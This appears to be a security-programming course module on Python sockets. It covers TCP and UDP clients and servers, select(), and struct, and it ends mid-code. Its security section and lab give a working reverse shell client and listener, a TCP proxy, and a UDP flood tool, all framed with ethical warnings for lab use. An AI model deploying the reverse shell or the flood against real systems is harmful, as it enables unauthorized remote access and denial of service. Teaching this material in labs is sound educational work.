CSY105 Week 05 Beginner

Programming for Security

Week Overview

This week dives into network programming—the foundation of offensive and defensive security tools. You'll learn to:

  • Understand TCP/IP at the socket level (beyond high-level libraries)
  • Build custom network clients and servers
  • Implement reverse shells, proxies, and network utilities
  • Handle network errors and timeouts gracefully
  • Use non-blocking sockets for concurrent connections
⚠️ Ethical Warning: Tools built this week (reverse shells, DoS testers, proxies) are powerful and potentially dangerous. Only use them in authorized lab environments or systems you own. Unauthorized use is illegal and unethical.
Real-World Context: Security tools like Metasploit, Cobalt Strike, and custom C2 frameworks are built on these socket programming fundamentals. Understanding sockets is essential for pentesting, malware analysis, and network forensics.

Section 1: OSI Model & Network Fundamentals

Quick OSI Review (Security Perspective)

In CSY104, you learned the 7-layer OSI model. For network programming in Python, we primarily work at:

  • Layer 3 (Network): IP addresses, routing (we'll work with IP packets)
  • Layer 4 (Transport): TCP/UDP ports (main focus this week)
  • Layer 7 (Application): HTTP, SSH, FTP (next week)

TCP vs UDP: Security Implications

TCP (Transmission Control Protocol)

  • ✅ Connection-oriented (3-way handshake)
  • ✅ Reliable delivery (packets acknowledged)
  • ✅ Ordered delivery
  • ⚠️ Slower (overhead from reliability)
  • Security Use: Reverse shells, C2 channels, reliable data exfiltration

UDP (User Datagram Protocol)

  • ✅ Connectionless (no handshake)
  • ❌ Unreliable (packets may be lost)
  • ❌ Unordered delivery
  • ✅ Faster (low overhead)
  • Security Use: DoS attacks, fast scanning, DNS tunneling, covert channels
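
The practical difference shows up in how data arrives. The sketch below is an illustration only: the function names are made up for this example, and socket.socketpair() stands in for a TCP connection (it returns a connected pair of stream sockets, which on most Unix systems are AF_UNIX rather than TCP). On loopback, datagrams normally arrive intact and in order, but UDP itself does not guarantee that.

```python
import socket


def udp_datagrams_on_loopback() -> list[bytes]:
    """Send two UDP datagrams to ourselves and return them as received."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as receiver, \
         socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sender:
        receiver.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
        receiver.settimeout(2.0)          # UDP gives no delivery guarantee
        address = receiver.getsockname()

        sender.sendto(b"first", address)
        sender.sendto(b"second", address)

        # Each recvfrom() returns exactly one datagram, never a merged blob
        return [receiver.recvfrom(4096)[0] for _ in range(2)]


def stream_bytes() -> bytes:
    """Send two messages over a stream socket pair and read the byte stream back."""
    left, right = socket.socketpair()     # connected pair of stream sockets
    with left, right:
        left.sendall(b"first")
        left.sendall(b"second")
        left.shutdown(socket.SHUT_WR)     # signal end of stream to the reader

        received = b""
        while chunk := right.recv(4096):
            received += chunk
        return received                   # message boundaries are gone


if __name__ == "__main__":
    print(udp_datagrams_on_loopback())
    print(stream_bytes())
```

A stream socket delivers a sequence of bytes with no record of where each send ended, which is why stream protocols need their own framing (length prefixes or delimiters).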

Port Numbers: The Security Landscape

#!/usr/bin/env python3
"""
Common ports from a security perspective
"""

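# Commonly targeted ports. Well-known ports (0-1023) usually require root/admin
# privileges to bind on Unix-like systems; the entries above 1023 here
# (3306, 3389, 5432, 5900, 8080) are registered ports and do not.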
COMMON_PORTS = {
    20: 'FTP Data',
    21: 'FTP Control',
    22: 'SSH',               # Secure Shell - common attack target
    23: 'Telnet',            # Unencrypted - legacy, avoid
    25: 'SMTP',              # Email - phishing, spam relay testing
    53: 'DNS',               # Domain Name System - tunneling, exfiltration
    80: 'HTTP',              # Web - most tested port
    110: 'POP3',             # Email retrieval
    143: 'IMAP',             # Email retrieval
    443: 'HTTPS',            # Encrypted web - certificate analysis
    445: 'SMB',              # Windows file sharing - EternalBlue, ransomware
    3306: 'MySQL',           # Database - SQL injection testing
    3389: 'RDP',             # Remote Desktop - brute force target
    5432: 'PostgreSQL',      # Database
    5900: 'VNC',             # Remote desktop - weak auth common
    8080: 'HTTP-Alt',        # Alternative web port
}

# Registered ports (1024-49151) - user applications
SECURITY_TOOL_PORTS = {
    4444: 'Metasploit Default Payload',
    8000: 'Python http.server',    # Named SimpleHTTPServer in Python 2
    8443: 'HTTPS Alternative',
    9001: 'Tor/HSQL/Supervisord',
}

# Dynamic/Private ports (49152-65535) - ephemeral client ports
# Used by OS for outgoing connections
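
The three ranges in the comments above can be expressed as a small helper. This is a sketch; classify_port is a name invented for this example, not part of any library.

```python
def classify_port(port: int) -> str:
    """Return the IANA range name for a TCP/UDP port number."""
    if not 0 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    if port <= 1023:
        return "well-known"      # 0-1023
    if port <= 49151:
        return "registered"      # 1024-49151
    return "dynamic"             # 49152-65535 (ephemeral client ports)


if __name__ == "__main__":
    for port in (22, 3306, 4444, 49152):
        print(port, classify_port(port))
```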

Section 2: Socket Programming Fundamentals

Creating Sockets

Python's socket module provides low-level network access:

#!/usr/bin/env python3
"""
Socket creation and basic operations
"""
import socket

# Create a TCP socket (IPv4)
tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Parameters explained:
# - AF_INET: IPv4 address family (use AF_INET6 for IPv6)
# - SOCK_STREAM: TCP socket (connection-oriented)

# Create a UDP socket
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# Parameters:
# - SOCK_DGRAM: UDP socket (datagram, connectionless)


# Socket options (important for security tools)
tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# SO_REUSEADDR: Allow binding to a port whose previous connections are still in TIME_WAIT
# Critical for servers that restart frequently

# Set timeout (prevents hanging on dead connections)
tcp_socket.settimeout(5.0)  # 5 second timeout

# Get socket information
print(f"Socket family: {tcp_socket.family}")    # AF_INET
print(f"Socket type: {tcp_socket.type}")        # SOCK_STREAM

# ALWAYS close sockets when done
tcp_socket.close()
udp_socket.close()

# Better: Use context managers (auto-close)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    # Use socket here
    pass
# Socket automatically closed
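
To confirm that the options and the context manager behave as described, the values can be read back. A minimal sketch; the variable names are only for illustration.

```python
import socket

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.settimeout(5.0)

    # getsockopt() returns a non-zero integer when the option is enabled
    # (the exact value varies by operating system)
    reuse_enabled = s.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR) != 0
    timeout = s.gettimeout()        # the value passed to settimeout()
    fd_while_open = s.fileno()      # a valid (non-negative) descriptor

# Leaving the with block closed the socket; fileno() now reports -1
fd_after_close = s.fileno()

print(reuse_enabled, timeout, fd_while_open >= 0, fd_after_close)
```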

TCP Client

A basic TCP client connects to a server, sends data, and receives a response:

#!/usr/bin/env python3
"""
Simple TCP client - connects to server and exchanges data
"""
import socket

def tcp_client(target_host: str, target_port: int, message: str) -> str | None:
    """
    Send message to TCP server, return response.

    Args:
        target_host: Target IP or hostname
        target_port: Target port
        message: Message to send

    Returns:
        Server response or None on error
    """
    try:
        # The context manager closes the socket even if an exception is raised
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
            # Set timeout to avoid hanging
            client.settimeout(5)

            # Connect to server (3-way handshake happens here)
            print(f"[*] Connecting to {target_host}:{target_port}...")
            client.connect((target_host, target_port))

            print(f"[*] Connected! Sending: {message}")

            # Send data (encode string to bytes). sendall() keeps sending
            # until every byte is written; send() may write only part of it.
            client.sendall(message.encode('utf-8'))

            # Receive response (a single recv() returns at most 4096 bytes)
            response = client.recv(4096)

        # Decode bytes to string
        response_str = response.decode('utf-8', errors='ignore')

        print(f"[*] Received: {response_str}")

        return response_str

    except socket.timeout:
        print(f"[!] Connection timeout to {target_host}:{target_port}")
        return None
    except socket.error as e:
        # socket.error is an alias of OSError in Python 3
        print(f"[!] Socket error: {e}")
        return None
    except Exception as e:
        print(f"[!] Error: {e}")
        return None


# Usage
if __name__ == '__main__':
    # Test with banner grabbing
    banner = tcp_client('scanme.nmap.org', 80, 'HEAD / HTTP/1.0\r\n\r\n')

    if banner:
        print(f"\n=== Banner ===\n{banner}")
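
A single recv(4096) returns whatever has arrived so far, which may be only part of the response. When the server closes the connection after replying (as an HTTP/1.0 server normally does), reading until recv() returns an empty bytes object collects everything. A sketch, with recv_until_closed as a hypothetical helper name:

```python
import socket


def recv_until_closed(sock: socket.socket, bufsize: int = 4096) -> bytes:
    """Read from sock until the peer closes its side, then return all bytes."""
    chunks = []
    while True:
        chunk = sock.recv(bufsize)
        if not chunk:               # b"" means the peer closed the connection
            break
        chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    # Local demonstration with a connected socket pair (no network needed)
    writer, reader = socket.socketpair()
    writer.sendall(b"x" * 5000)
    writer.close()
    print(len(recv_until_closed(reader, bufsize=1024)))
    reader.close()
```

With a timeout set on the socket, a peer that never closes would end the loop with socket.timeout instead of blocking forever.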

TCP Server

A TCP server listens for incoming connections and handles clients:

#!/usr/bin/env python3
"""
Simple TCP server - listens for connections and echoes data back
"""
import socket
import threading

def handle_client(client_socket: socket.socket, address: tuple) -> None:
    """
    Handle individual client connection.

    Args:
        client_socket: Connected client socket
        address: (ip, port) tuple of client
    """
    print(f"[*] Accepted connection from {address[0]}:{address[1]}")

    try:
        # Receive data from client
        data = client_socket.recv(4096)

        if data:
            message = data.decode('utf-8', errors='ignore')
            print(f"[*] Received: {message}")

            # Echo data back to client (sendall() keeps sending until every byte is written)
            response = f"You sent: {message}"
            client_socket.sendall(response.encode('utf-8'))

    except Exception as e:
        print(f"[!] Error handling client: {e}")

    finally:
        # Always close client socket
        client_socket.close()
        print(f"[*] Connection closed: {address[0]}:{address[1]}")


def tcp_server(bind_ip: str, bind_port: int) -> None:
    """
    Start TCP server and listen for connections.

    Args:
        bind_ip: IP to bind to (0.0.0.0 = all interfaces)
        bind_port: Port to listen on
    """
    # Create server socket
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # Reuse address (important for quick restarts)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    # Bind to address and port
    server.bind((bind_ip, bind_port))

    # Listen for connections (backlog queue = 5)
    server.listen(5)

    print(f"[*] Listening on {bind_ip}:{bind_port}")

    try:
        while True:
            # Accept incoming connection (blocks until client connects)
            client_socket, address = server.accept()

            # Handle client in separate thread (allows multiple clients)
            client_thread = threading.Thread(
                target=handle_client,
                args=(client_socket, address)
            )
            client_thread.start()

    except KeyboardInterrupt:
        print("\n[!] Server shutting down...")
    finally:
        server.close()


# Usage
if __name__ == '__main__':
    # Listen on all interfaces, port 9999
    tcp_server('0.0.0.0', 9999)
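
Binding to 0.0.0.0 exposes the server on every interface. For lab work, a more cautious sketch is to bind to loopback only and let the operating system choose a free port by passing port 0; bind_ephemeral is a name invented for this example.

```python
import socket


def bind_ephemeral(bind_ip: str = "127.0.0.1") -> socket.socket:
    """Return a listening TCP socket on an OS-assigned port."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((bind_ip, 0))       # port 0: the OS picks an unused port
    server.listen(5)
    return server


if __name__ == "__main__":
    server = bind_ephemeral()
    ip, port = server.getsockname()  # discover which port was assigned
    print(f"[*] Listening on {ip}:{port}")
    server.close()
```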

UDP Client & Server

UDP is connectionless and simpler than TCP, but delivery is not guaranteed:

#!/usr/bin/env python3
"""
UDP client and server examples
"""
import socket

# UDP CLIENT
def udp_client(target_host: str, target_port: int, message: str) -> None:
    """
    Send UDP datagram to target.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    try:
        # No connect() needed - just send
        client.sendto(message.encode('utf-8'), (target_host, target_port))

        # Try to receive response (may timeout)
        client.settimeout(2)
        data, server = client.recvfrom(4096)

        print(f"[*] Received from {server}: {data.decode('utf-8', errors='ignore')}")

    except socket.timeout:
        print("[!] No response received")
    finally:
        client.close()


# UDP SERVER
def udp_server(bind_ip: str, bind_port: int) -> None:
    """
    Start UDP server.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    server.bind((bind_ip, bind_port))

    print(f"[*] Listening on {bind_ip}:{bind_port} (UDP)")

    try:
        while True:
            # Receive data and client address
            data, address = server.recvfrom(4096)

            print(f"[*] Received from {address[0]}:{address[1]}: {data.decode('utf-8', errors='ignore')}")

            # Send response back
            response = b"UDP ACK"
            server.sendto(response, address)

    except KeyboardInterrupt:
        print("\n[!] Server shutting down...")
    finally:
        server.close()


# Usage
if __name__ == '__main__':
    import sys

    if len(sys.argv) < 2:
        print("Usage: python script.py [client|server]")
        sys.exit(1)

    mode = sys.argv[1]

    if mode == 'server':
        udp_server('0.0.0.0', 9999)
    elif mode == 'client':
        udp_client('127.0.0.1', 9999, 'Hello UDP!')
    else:
        print("Invalid mode. Use 'client' or 'server'")

Section 3: Advanced Socket Techniques

Non-Blocking Sockets & select()

Non-blocking sockets allow handling multiple connections efficiently without threading:

#!/usr/bin/env python3
"""
Non-blocking sockets with select() for concurrent handling
"""
import socket
import select

def non_blocking_server(bind_ip: str, bind_port: int) -> None:
    """
    TCP server using select() to handle multiple clients without threads.
    """
    # Create server socket
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((bind_ip, bind_port))
    server.listen(5)

    # Make server non-blocking
    server.setblocking(False)

    print(f"[*] Non-blocking server on {bind_ip}:{bind_port}")

    # List of sockets to monitor
    sockets_list = [server]

    # Dict to store client data
    clients = {}

    try:
        while True:
            # Wait for socket to be ready (read, write, error)
            # Timeout = 1 second (check for new activity every second)
            read_sockets, write_sockets, error_sockets = select.select(
                sockets_list,  # Read list
                [],            # Write list (empty - not writing)
                sockets_list,  # Error list
                1.0            # Timeout
            )

            # Handle readable sockets
            for notified_socket in read_sockets:
                # New connection
                if notified_socket == server:
                    client_socket, client_address = server.accept()
                    client_socket.setblocking(False)

                    sockets_list.append(client_socket)
                    clients[client_socket] = client_address

                    print(f"[*] New connection: {client_address[0]}:{client_address[1]}")

                # Data from existing client
                else:
                    try:
                        data = notified_socket.recv(4096)

                        if data:
                            message = data.decode('utf-8', errors='ignore')
                            address = clients[notified_socket]
                            print(f"[*] From {address[0]}:{address[1]}: {message}")

                            # Echo back
                            notified_socket.send(f"Echo: {message}".encode('utf-8'))
                        else:
                            # Empty data = client disconnected
                            raise Exception("Client disconnected")

                    except Exception:  # a bare except would also swallow KeyboardInterrupt
                        # Remove client
                        address = clients[notified_socket]
                        print(f"[*] Connection closed: {address[0]}:{address[1]}")

                        sockets_list.remove(notified_socket)
                        del clients[notified_socket]
                        notified_socket.close()

            # Handle socket errors
            for notified_socket in error_sockets:
                # The socket may already have been removed in the read loop above
                if notified_socket in sockets_list:
                    sockets_list.remove(notified_socket)
                clients.pop(notified_socket, None)
                notified_socket.close()

    except KeyboardInterrupt:
        print("\n[!] Shutting down...")
    finally:
        for sock in sockets_list:
            sock.close()


if __name__ == '__main__':
    non_blocking_server('0.0.0.0', 9999)
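
The core of the server above is the readiness check that select() performs. The sketch below isolates it using a local socket pair; is_readable is a hypothetical helper name.

```python
import select
import socket


def is_readable(sock: socket.socket, timeout: float = 0.0) -> bool:
    """Return True if sock has data (or a close) waiting to be read."""
    readable, _, _ = select.select([sock], [], [], timeout)
    return bool(readable)


if __name__ == "__main__":
    a, b = socket.socketpair()
    print(is_readable(b))        # nothing sent yet
    a.sendall(b"ping")
    print(is_readable(b, 1.0))   # data is now waiting
    a.close()
    b.close()
```

A timeout of 0 makes select() poll and return immediately; a positive timeout waits up to that many seconds for activity.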

Binary Data with struct

For network protocols, you often need to pack/unpack binary data:

#!/usr/bin/env python3
"""
Binary data handling with struct module
"""
import socket
import struct

# Pack data into binary format
def pack_message(msg_type: int, length: int, data: bytes) -> bytes:
    """
    Pack message into binary format:
    - 2 bytes: message type (unsigned short)
    - 4 bytes: data length (unsigned int)
    - N bytes: data

    Format string:
    - '!': Network byte order (big-endian)
    - 'H': Unsigned short (2 bytes)
    - 'I': Unsigned int (4 bytes)
    """
    header = struct.pack('!HI', msg_type, length)
    return header + data


# Unpack binary data
def unpack_message(binary_data: bytes) -> tuple:
    """
    Unpack binary message.

    Returns:
        (msg_type, length, data) tuple
    """
    # Unpack header (6 bytes total: 2 + 4)
    header = binary_data[:6]
    msg_type, length = struct.unpack('!HI', header)

    # Extract data
    data = binary_data[6:6+length]

    return msg_type, length, data


# Example: Send binary message
def send_binary_message(host: str, port: int) -> None:
    """
    Send binary message to server.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))

    # Create message
    msg_type = 1  # Command message
    data = b"HELLO_SERVER"
    length = len(data)

    # Pack and send
    message = pack_message(msg_type, length, data)
    sock.send(message)

    # Receive response
    response = sock.recv(1024)
    msg_type, length, data = unpack_message(response)

    print(f"Received type {msg_type}: {data.decode('utf-8')}")

    sock.close()


# Common struct format codes
"""
Format | C Type           | Python Type | Size (bytes)
-------|------------------|-------------|-------------
!      | Network order    | (big-endian)| N/A
b      | signed char      | int         | 1
B      | unsigned char    | int         | 1
h      | short            | int         | 2
H      | unsigned short   | int         | 2
i      | int              | int         | 4
I      | unsigned int     | int         | 4
q      | long long        | int         | 8
Q      | unsigned long long | int       | 8
f      | float            | float       | 4
d      | double           | float       | 8
s      | char[]           | bytes       | varies
"""

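Because TCP is a byte stream, one recv() call may return less than a full message. A length-prefixed header like the one above lets the receiver read exactly the right number of bytes. The following is a sketch under assumptions: recv_exact, recv_message, and MAX_PAYLOAD are names and limits invented for this example.

```python
import socket
import struct

HEADER_FORMAT = "!HI"                          # type (2 bytes) + length (4 bytes)
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)   # 6 bytes, no padding with '!'
MAX_PAYLOAD = 1_000_000                        # assumed cap; the length field is untrusted input


def recv_exact(sock: socket.socket, count: int) -> bytes:
    """Read exactly count bytes or raise if the peer closes early."""
    buf = bytearray()
    while len(buf) < count:
        chunk = sock.recv(count - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before the full message arrived")
        buf.extend(chunk)
    return bytes(buf)


def recv_message(sock: socket.socket) -> tuple[int, bytes]:
    """Read one framed message and return (msg_type, data)."""
    msg_type, length = struct.unpack(HEADER_FORMAT, recv_exact(sock, HEADER_SIZE))
    if length > MAX_PAYLOAD:
        raise ValueError(f"declared length {length} exceeds limit")
    return msg_type, recv_exact(sock, length)


if __name__ == "__main__":
    header = struct.pack(HEADER_FORMAT, 1, 12)
    print(header)                              # b'\x00\x01\x00\x00\x00\x0c'

    a, b = socket.socketpair()                 # local stand-in for a TCP connection
    a.sendall(header + b"HELLO_SERVER")
    print(recv_message(b))
    a.close()
    b.close()
```

Checking the declared length before reading matters in security tooling, since a hostile peer can claim a payload of up to 4 GiB.
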
Error Handling Best Practices

#!/usr/bin/env python3
"""
Robust network error handling
"""
import socket
import errno

def robust_tcp_client(host: str, port: int) -> None:
    """
    TCP client with comprehensive error handling.
    """
    sock = None

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)

        # Connect
        sock.connect((host, port))

        # Send data
        sock.sendall(b"GET / HTTP/1.0\r\n\r\n")

        # Receive data
        data = sock.recv(4096)
        print(data.decode('utf-8', errors='ignore'))

    except socket.timeout:
        print(f"[!] Connection timeout to {host}:{port}")

    except socket.gaierror as e:
        # DNS resolution error
        print(f"[!] DNS resolution failed for {host}: {e}")

    except ConnectionRefusedError:
        print(f"[!] Connection refused by {host}:{port} (port closed)")

    except ConnectionResetError:
        print(f"[!] Connection reset by peer")

    except BrokenPipeError:
        print(f"[!] Broken pipe (remote end closed)")

    except OSError as e:
        if e.errno == errno.ENETUNREACH:
            print(f"[!] Network unreachable")
        elif e.errno == errno.EHOSTUNREACH:
            print(f"[!] Host unreachable")
        else:
            print(f"[!] OS error: {e}")

    except Exception as e:
        print(f"[!] Unexpected error: {e}")

    finally:
        if sock:
            sock.close()
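
The same exception classes can be turned into a result value instead of printed messages. The sketch below is one possible mapping; probe_port and its return labels are invented for this example, and it should only be pointed at hosts you are authorized to test.

```python
import socket


def probe_port(host: str, port: int, timeout: float = 2.0) -> str:
    """Try a TCP connection and describe the outcome as a short label."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"          # the host answered with a reset
    except socket.timeout:
        return "no-response"     # nothing came back (often a filtering firewall)
    except OSError:
        return "error"           # DNS failure, unreachable network, etc.


if __name__ == "__main__":
    # Demonstrate against a listener we create ourselves on loopback
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    print(probe_port("127.0.0.1", port))
    listener.close()
    print(probe_port("127.0.0.1", port))
```

The order of the except clauses matters: ConnectionRefusedError and socket.timeout are subclasses of OSError, so the general handler has to come last.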

Section 4: Security Applications

Reverse Shell (Educational)

⚠️ WARNING: This is for understanding attack/defense only. Unauthorized use is illegal.

#!/usr/bin/env python3
"""
Simple reverse shell - FOR EDUCATION ONLY
Demonstrates how attackers maintain access to compromised systems
"""
import socket
import subprocess
import os

def reverse_shell_client(server_ip: str, server_port: int) -> None:
    """
    Connect back to attacker's server and provide shell access.

    This is how malware/backdoors work. Understanding this helps
    defenders detect and prevent such attacks.
    """
    # Create the socket before the try block so the finally clause can always close it
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Connect to attacker's listener
        sock.connect((server_ip, server_port))

        # Send banner
        sock.send(b"[*] Reverse shell connected\n")

        while True:
            # Receive command from attacker
            command = sock.recv(4096).decode('utf-8').strip()

            if not command:
                break

            if command.lower() == 'exit':
                break

            # Execute command
            try:
                # Run command and capture output
                output = subprocess.check_output(
                    command,
                    shell=True,
                    stderr=subprocess.STDOUT,
                    stdin=subprocess.DEVNULL
                )
                sock.send(output)
            except Exception as e:
                error_msg = f"Error: {str(e)}\n"
                sock.send(error_msg.encode('utf-8'))

            # Send prompt
            sock.send(b"\n>>> ")

    except Exception as e:
        pass
    finally:
        sock.close()


def reverse_shell_listener(bind_ip: str, bind_port: int) -> None:
    """
    Attacker's listener - waits for victim to connect back.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((bind_ip, bind_port))
    server.listen(1)

    print(f"[*] Listening on {bind_ip}:{bind_port}")
    print("[*] Waiting for reverse shell connection...")

    client, address = server.accept()
    print(f"[*] Connection from {address[0]}:{address[1]}")

    try:
        while True:
            # Receive banner/output
            data = client.recv(4096)
            if not data:
                break

            print(data.decode('utf-8', errors='ignore'), end='')

            # Send command
            command = input()
            if command.lower() == 'exit':
                client.send(b'exit\n')
                break

            client.send(command.encode('utf-8') + b'\n')

    except KeyboardInterrupt:
        print("\n[!] Exiting...")
    finally:
        client.close()
        server.close()


# USAGE (in isolated lab only):
# Terminal 1 (attacker): python script.py listener
# Terminal 2 (victim):   python script.py client 127.0.0.1 4444

if __name__ == '__main__':
    import sys

    if len(sys.argv) < 2:
        print("Usage:")
        print("  Listener: python script.py listener")
        print("  Client:   python script.py client <server_ip> <server_port>")
        sys.exit(1)

    mode = sys.argv[1]

    if mode == 'listener':
        reverse_shell_listener('0.0.0.0', 4444)
    elif mode == 'client' and len(sys.argv) == 4:
        reverse_shell_client(sys.argv[2], int(sys.argv[3]))
    else:
        print("Invalid arguments")

Network Proxy

A simple TCP proxy for traffic inspection and modification:

#!/usr/bin/env python3
"""
Simple TCP proxy - intercept and inspect network traffic
Useful for analyzing protocols, debugging, MITM testing
"""
import socket
import threading

def proxy_handler(client_socket, remote_host, remote_port):
    """
    Handle proxy connection - forward traffic both ways.
    """
    # Connect to remote server
    remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        remote_socket.connect((remote_host, remote_port))
        print(f"[*] Connected to {remote_host}:{remote_port}")

        # Start forwarding in both directions
        # Client -> Remote
        def forward_to_remote():
            while True:
                data = client_socket.recv(4096)
                if not data:
                    break

                print(f"[→] Client sent {len(data)} bytes")
                # Optionally inspect/modify data here
                remote_socket.sendall(data)  # sendall() forwards the whole chunk

        # Remote -> Client
        def forward_to_client():
            while True:
                data = remote_socket.recv(4096)
                if not data:
                    break

                print(f"[←] Server sent {len(data)} bytes")
                # Optionally inspect/modify data here
                client_socket.sendall(data)  # sendall() forwards the whole chunk

        # Run both directions concurrently
        t1 = threading.Thread(target=forward_to_remote)
        t2 = threading.Thread(target=forward_to_client)

        t1.start()
        t2.start()

        t1.join()
        t2.join()

    except Exception as e:
        print(f"[!] Proxy error: {e}")
    finally:
        client_socket.close()
        remote_socket.close()


def tcp_proxy(local_host, local_port, remote_host, remote_port):
    """
    Start TCP proxy server.

    Args:
        local_host: Interface to bind to
        local_port: Port to listen on
        remote_host: Target server IP
        remote_port: Target server port
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((local_host, local_port))
    server.listen(5)

    print(f"[*] Proxy listening on {local_host}:{local_port}")
    print(f"[*] Forwarding to {remote_host}:{remote_port}")

    try:
        while True:
            client_socket, addr = server.accept()
            print(f"[*] Connection from {addr[0]}:{addr[1]}")

            # Handle in separate thread
            proxy_thread = threading.Thread(
                target=proxy_handler,
                args=(client_socket, remote_host, remote_port)
            )
            proxy_thread.start()

    except KeyboardInterrupt:
        print("\n[!] Shutting down proxy...")
    finally:
        server.close()


# Usage: python proxy.py
# Then connect to localhost:8080, traffic forwarded to target
if __name__ == '__main__':
    tcp_proxy('127.0.0.1', 8080, 'example.com', 80)
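
The "inspect data here" comments in the proxy are where a logging hook would go. As a sketch of what such a hook might look like, the hypothetical describe_chunk function below summarizes a chunk by its size and first line, which for HTTP traffic is the request or status line.

```python
def describe_chunk(direction: str, data: bytes, limit: int = 200) -> str:
    """Return a one-line summary of a forwarded chunk for logging."""
    # Take everything up to the first CRLF, capped at limit bytes
    first_line = data.split(b"\r\n", 1)[0][:limit]
    # Non-ASCII bytes are replaced so binary traffic cannot break the log
    text = first_line.decode("ascii", errors="replace")
    return f"[{direction}] {len(data)} bytes: {text}"


if __name__ == "__main__":
    request = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
    print(describe_chunk("client", request))
```

Keeping the hook a pure function of the bytes makes it easy to test without running the proxy.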

Lab 5: Network Programming

⚠️ Legal Warning: Only run these labs in authorized environments (VMs, local networks you own). Reverse shells, DoS tools, and proxies can be illegal if misused.
⏱️ 150 minutes total | Difficulty: Advanced

Part 1: TCP Reverse Shell (Client/Server) (45 minutes)

Objective: Build a functional reverse shell to understand how attackers maintain access to compromised systems.

Requirements:

  1. Create reverse_shell.py with two modes:
    • Listener mode: Waits for victim to connect, provides command prompt
    • Client mode: Connects back to listener, executes commands
  2. Features:
    • Execute shell commands and return output
    • Handle errors gracefully (command not found, etc.)
    • Reconnect on disconnect (persistence)
    • Clean exit command
  3. Test in local VM only (two terminal windows)

Success Criteria:

  • Listener accepts connection from client
  • Can execute commands like ls, whoami, pwd
  • Output returned to listener correctly
  • Exit command closes connection cleanly
Hint: Command Execution
import subprocess

def run_command(command: str) -> bytes:
    """Execute a command and return its output (stdout and stderr combined)."""
    try:
        output = subprocess.check_output(
            command,
            shell=True,
            stderr=subprocess.STDOUT,  # Capture errors too
            timeout=30  # Kill after 30 seconds
        )
        return output
    except subprocess.TimeoutExpired:
        return b"Error: Command timeout\n"
    except Exception as e:
        return f"Error: {str(e)}\n".encode('utf-8')

Part 2: UDP Flood Tester (40 minutes)

Objective: Build a UDP flood tool to understand DoS attacks (for defensive knowledge only).

Requirements:

  1. Create udp_flood.py that:
    • Accepts target IP, port, and packet count as arguments
    • Sends rapid UDP packets to target
    • Displays packets/second rate
    • Includes rate limiting option (to avoid accidental DoS)
  2. Add monitoring mode:
    • Listen for UDP flood traffic
    • Count packets received per second
    • Alert when threshold exceeded
  3. ⚠️ Test ONLY against your own systems in isolated lab

Success Criteria:

  • Send at least 100 UDP packets/second
  • Display statistics (packets sent, bytes sent, duration)
  • Monitoring mode detects flood
  • Rate limiting works correctly
Hint: High-Speed UDP Sending
import socket
import time

def udp_flood(target_ip, target_port, packet_count, rate_limit=None):
    """
    Send UDP flood to target.

    Args:
        target_ip: Target IP
        target_port: Target port
        packet_count: Number of packets to send
        rate_limit: Max packets/second (None = unlimited)
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    # Random or fixed payload
    payload = b"X" * 1024  # 1KB packet

    start_time = time.time()
    packets_sent = 0

    for i in range(packet_count):
        sock.sendto(payload, (target_ip, target_port))
        packets_sent += 1

        # Rate limiting
        if rate_limit:
            time.sleep(1.0 / rate_limit)

        # Progress every 100 packets
        if packets_sent % 100 == 0:
            elapsed = time.time() - start_time
            pps = packets_sent / elapsed
            print(f"[*] Sent {packets_sent} packets ({pps:.2f} pps)")

    elapsed = time.time() - start_time
    print(f"\n[*] Flood complete: {packets_sent} packets in {elapsed:.2f}s")
    print(f"[*] Average rate: {packets_sent / elapsed:.2f} pps")

    sock.close()
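
For the monitoring mode in the requirements, the detection side can be sketched as a sliding-window counter. PacketRateMonitor is a hypothetical class name, and the one-second window is an assumption; timestamps are passed in explicitly so the logic can be tested without real traffic.

```python
from collections import deque


class PacketRateMonitor:
    """Track packet arrivals and flag when the rate exceeds a threshold."""

    def __init__(self, threshold_pps: int, window: float = 1.0):
        self.threshold_pps = threshold_pps
        self.window = window            # sliding window length in seconds
        self._arrivals = deque()        # timestamps of recent packets

    def record(self, timestamp: float) -> bool:
        """Record one packet; return True if the current rate is over threshold."""
        self._arrivals.append(timestamp)
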